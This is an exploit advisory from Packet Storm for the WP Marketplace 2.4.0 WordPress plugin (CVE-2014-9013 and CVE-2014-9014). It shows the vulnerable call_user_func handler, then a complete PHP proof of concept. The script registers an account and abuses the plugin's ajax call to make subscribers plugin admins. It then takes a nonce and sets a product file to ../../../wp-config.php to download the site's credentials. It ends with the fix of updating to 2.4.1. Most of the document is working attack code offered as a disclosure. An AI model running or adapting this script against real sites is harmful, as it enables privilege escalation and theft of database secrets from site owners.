WordPress Marketplace 2.4.0 Arbitrary File Download

2015-03-25T00:00:00
ID PACKETSTORM:131018
Type packetstorm
Reporter Kacper Szurek
Modified 2015-03-25T00:00:00

Description

                                        
                                            `# Exploit Title: WP Marketplace 2.4.0 Arbitrary File Download  
# Date: 26-10-2014  
# Software Link: https://wordpress.org/plugins/wpmarketplace/  
# Exploit Author: Kacper Szurek  
# Contact: http://twitter.com/KacperSzurek  
# Website: http://security.szurek.pl/  
# Category: webapps  
# CVE: CVE-2014-9013 and CVE-2014-9014  
  
1. Description  
  
Anyone can run user defined function because of call_user_func.  
  
File: wpmarketplace\libs\cart.php  
  
function ajaxinit(){  
if(isset($_POST['action']) && $_POST['action']=='wpmp_pp_ajax_call'){  
if(function_exists($_POST['execute']))  
call_user_func($_POST['execute'],$_POST);  
else  
echo __("function not defined!","wpmarketplace");  
die();  
}  
}  
  
http://security.szurek.pl/wp-marketplace-240-arbitrary-file-download.html  
  
2. Proof of Concept  
  
$file = '../../../wp-config.php';  
$url = 'http://wordpress-url/';  
$user = 'userlogin';  
$email = 'useremail@email.email';  
$pass = 'password';  
$cookie = "/cookie.txt";  
  
$ckfile = dirname(__FILE__) . $cookie;  
$cookie = fopen($ckfile, 'w') or die("Cannot create cookie file");  
  
// Register  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, $url.'?checkout_register=register');  
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);  
curl_setopt($ch, CURLOPT_TIMEOUT, 10);  
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);  
curl_setopt($ch, CURLOPT_POST, 1);  
curl_setopt($ch,  
CURLOPT_POSTFIELDS,  
array(  
'register_form' => 'register',  
'reg[user_login]' => $user,  
'reg[user_email]' => $email,  
'reg[user_pass]' => $pass  
));  
$content = curl_exec($ch);  
if (!preg_match("/success/i", $content)) {  
die("Cannot register");  
}  
// Log in  
curl_setopt($ch, CURLOPT_URL, $url.'wp-login.php');  
curl_setopt($ch,  
CURLOPT_POSTFIELDS,  
array(  
'log' => $user,  
'pwd' => $pass,  
'wp-submit' => 'Log%20In'  
));  
$content = curl_exec($ch);  
if (!preg_match('/adminmenu/i', $content)) {  
die("Cannot login");  
}  
// Add subscriber as plugin admin  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch,  
CURLOPT_POSTFIELDS,  
array(  
'action' => 'wpmp_pp_ajax_call',  
'execute' => 'wpmp_save_settings',  
'_wpmp_settings[user_role][]' => 'subscriber'  
));  
$content = curl_exec($ch);  
if (!preg_match('/Settings Saved Successfully/i', $content)) {  
die("Cannot set role");  
}  
// Request noonce  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch,  
CURLOPT_POSTFIELDS,  
array(  
'action' => 'wpmp_pp_ajax_call',  
'execute' => 'wpmp_front_add_product'  
));  
$content = curl_exec($ch);  
preg_match('/name="__product_wpmp" value="([^"]+)"/i', $content, $nonce);  
if (strlen($nonce[1]) < 2) {  
die("Cannot get nonce");  
}  
// Set file to download  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch,  
CURLOPT_POSTFIELDS,  
array(  
'__product_wpmp' => $nonce[1],  
'post_type' => 'wpmarketplace',  
'id' => '123456',  
'wpmp_list[base_price]' => '0',  
'wpmp_list[file][]' => $file  
));  
$content = curl_exec($ch);  
header("Location: ".$url."?wpmpfile=123456");  
  
3. Solution:  
  
Update to version 2.4.1  
  
https://downloads.wordpress.org/plugin/wpmarketplace.2.4.1.zip  
  
  
`